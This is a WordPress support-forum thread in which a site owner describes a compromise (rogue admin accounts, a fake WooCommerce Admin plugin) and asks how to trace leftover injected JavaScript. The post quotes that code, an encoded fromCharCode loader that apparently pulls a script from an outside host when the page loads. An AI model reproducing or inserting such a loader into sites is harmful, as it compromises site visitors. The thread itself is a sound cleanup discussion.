Site Compromised – A Few Things…

  • Resolved Jason Ryan

    (@viablethought)


    4 years, 7 months ago

    Hello –

    Had a client’s website get compromised literally in front of my eyes where Admin accounts were being created along with a fake WooCommerce Admin plugin that was being added to the plugins directory.

    Meanwhile, there were no alerts or red flags sent, we only knew about it because of the email notifications from the website about new users being added to the website and immediately jumped into action to remove the new users and the fake plugin that was picked up by a Wordfence scan after it was installed.

    There is still remnants of JS code being injected into the “body” class of the website:

    onmouseoverjavascriptevalString-fromCharCode33102117110991161051111104010144115441164112311011710810861611014610310111669108101109101110116661217310040349710010910511010611511297103101344138384040116611014699114101971161016910810110910111011640115414146971151211109961334844116461051006134971001091051101061151129710310134441164611511499613410411611611211558474711710998114105971199710810710511010346991111094799111117110116101114471151051091121081014610611534444010161101461031011166910810110910111011611566121849710378971091014011541914893414611297114101110116781111001014610511011510111411666101102111114101401164410141411254010011199117109101110116443411599114105112116344159

    Attempting to track down where this is being output because neither Wordfence nor Quttera is picking up on this code being left behind or its location.

    We have cleaned out several sites in the past few months and this one seems to be the strangest one we’ve seen. Typically it has been just some code injection in some WP files, but Admin accounts and a fake plugin undetected is really frightening.

    Any insight on how to do a deeper scan to find where that code above is being output into the site?

    Thanks.

Viewing 3 replies - 1 through 3 (of 3 total)

  • Hey @viablethought,

    I know you’ve mentioned that you’ve cleaned out several sites recently, have you had a chance to look through the Wordfence guide on cleaning a hacked site? If not, it might shed some light on different techniques. However, if you’re still unable to track this down I’d suggest reaching out to a professional hack repair service to have it cleaned, and the point of entry patched. From this vantage point, it’s purely a guessing game.

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thanks,

    Gerroald

    Hey @viablethought,

    We haven’t heard back from you in a while, so I’ve gone ahead and marked this thread as resolved.

    Please feel free to open another thread if you’re still having issues with Wordfence.

    Thanks,

    Gerroald

    Thread Starter Jason Ryan

    (@viablethought)

    @wfgerald

    Sorry for the delayed response. The site is running fine but that code still exists on the Home page of the site in the “body” class. But just on the Home page, no other pages.

    That said, there were 2 plugins that were removed at that time and the website hasn’t had any other issues since. The plugins were:

    1. WooCommerce Admin
    2. The Pro version of this plugin: here

    I plan on going through it with a fine-toothed comb in a couple of days to try and track down this code. I have already deleted the wp-includes and wp-admin directories and re-uploaded new files, deleted WooCommerce and re-installed that, but have a few more plugins to check.

    Thanks

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Site Compromised – A Few Things…’ is closed to new replies.